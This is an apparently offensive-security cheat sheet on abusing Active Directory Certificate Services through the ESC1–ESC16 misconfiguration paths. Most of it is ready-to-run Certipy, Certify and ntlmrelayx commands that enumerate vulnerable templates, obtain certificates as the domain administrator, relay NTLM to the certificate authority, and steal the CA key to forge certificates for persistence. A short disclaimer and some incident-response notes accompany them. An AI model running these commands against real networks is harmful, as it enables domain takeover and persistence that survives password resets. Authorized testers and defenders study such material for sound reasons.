ADCS-ATTACKS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
Active Directory Certificate Services (ADCS) misconfigurations enable privilege escalation and domain persistence. The "ESC" taxonomy (SpecterOps) catalogs the abuse paths. Primary tooling: Certipy (Linux) and Certify/PSPKIAudit (Windows). Authorized testing only.
ENUMERATION - CERTIPY#
certipy find -u user@corp.lu -p pass -dc-ip <dc>
certipy find -u user@corp.lu -p pass -dc-ip <dc> -vulnerable
# Only flag exploitable templates
certipy find -u user@corp.lu -p pass -dc-ip <dc> -stdout
certipy find ... -old-bloodhound # BloodHound-importable output
# Reports CA hosts, templates, enrollment rights, EKUs, flags
ENUMERATION - CERTIFY (WINDOWS)#
Certify.exe find # All templates + CAs Certify.exe find /vulnerable # Vulnerable templates Certify.exe find /enrolleeSuppliesSubject # ESC1 candidates
ESC1 - SUPPLY SAN#
# Template: enrollee supplies subject + client auth EKU + low-priv enroll certipy req -u user@corp.lu -p pass -dc-ip <dc> -ca <CA-NAME> \ -template <VulnTemplate> -upn administrator@corp.lu # -> get a cert as any user (e.g. Domain Admin), then auth: certipy auth -pfx administrator.pfx -dc-ip <dc>
ESC2 - ANY PURPOSE EKU#
# Template has Any Purpose or no EKU -> usable for auth certipy req ... -template <VulnTemplate> -upn administrator@corp.lu
ESC3 - ENROLLMENT AGENT#
# Certificate Request Agent EKU -> enroll on behalf of others certipy req ... -template <AgentTemplate> # get agent cert certipy req ... -template User -on-behalf-of 'CORP\administrator' \ -pfx agent.pfx
ESC4 - TEMPLATE ACL ABUSE#
# You have write over a template -> make it ESC1, exploit, revert certipy template -u user@corp.lu -p pass -template <T> \ -save-old -write-default-configuration # (older syntax varies)
ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2#
# CA flag lets any request specify a SAN (pre-May 2022 patch) certipy req ... -template User -upn administrator@corp.lu
ESC7 - CA ACCESS RIGHTS#
# ManageCA / ManageCertificates rights on the CA itself certipy ca -u u -p p -ca <CA> -add-officer <user> # ESC7 -> ESC7 # Enable a template, approve requests, or flip EDITF flags
ESC8 - HTTP ENROLLMENT RELAY#
# Web enrollment (certsrv) without EPA -> NTLM relay impacket-ntlmrelayx -t http://<ca>/certsrv/certfnsh.asp --adcs \ --template DomainController -smb2support # (coerce DC auth via PetitPotam - see NTLM-RELAY.txt)
ESC9 / ESC10 - NO SECURITY EXTENSION / WEAK MAPPING#
# Certificate mapping weaknesses (szOID / UPN manipulation) # Requires GenericWrite over a victim to alter UPN, then enroll certipy account -u u -p p -user <victim> -upn administrator update certipy req ... -template <T> # then revert UPN
ESC11 - RPC ENROLLMENT RELAY (IF_ENFORCEENCRYPTICERTREQUEST)#
# Relay to the CA RPC (ICertPassage) endpoint when unencrypted impacket-ntlmrelayx -t rpc://<ca> -rpc-mode ICPR \ -icpr-ca-name <CA> --adcs --template User
ESC13 - ISSUANCE POLICY -> GROUP LINK#
# Template linked to an issuance policy mapped to a privileged group certipy req ... -template <T> # cert grants group membership
ESC14/15/16 - MAPPING & EXTENSION ABUSE#
# ESC15 (CVE-2024-49019): "EKUwu" - v1 templates + app policies certipy req ... -template WebServer -upn administrator@corp.lu \ -application-policies 'Client Authentication' # ESC16: security-extension-disabled scenarios / mapping abuse
PERSISTENCE#
# Steal CA private key -> forge certs for any principal (Golden Cert): certipy ca -backup -ca <CA> -u u -p p # if you have DA/CA admin certipy forge -ca-pfx ca.pfx -upn administrator@corp.lu # Certificates survive password resets - long-lived persistence
EXAMPLES#
# One-shot vulnerability discovery certipy find -u user@corp.lu -p 'Pass' -dc-ip 10.0.0.1 -vulnerable -stdout # ESC1 to Domain Admin certipy req -u user@corp.lu -p 'Pass' -dc-ip 10.0.0.1 -ca CORP-CA \ -template VulnTemplate -upn administrator@corp.lu certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1 # -> yields NT hash + TGT for administrator
NOTES#
- Run 'certipy find -vulnerable' first; it auto-classifies ESC1-ESC16 - Certificates are password-reset resistant = strong persistence; in IR you must revoke certs / rotate the CA key, not just reset pw - ESC8/ESC11 combine with coercion (NTLM-RELAY.txt) for DA from low priv without cracking anything - The May 2022 KB5014754 patch changed cert mapping (strong mapping) and drives ESC9/ESC10/ESC16 scenarios - Map remediation to DORA ICT risk mgmt + PKI governance for FS clients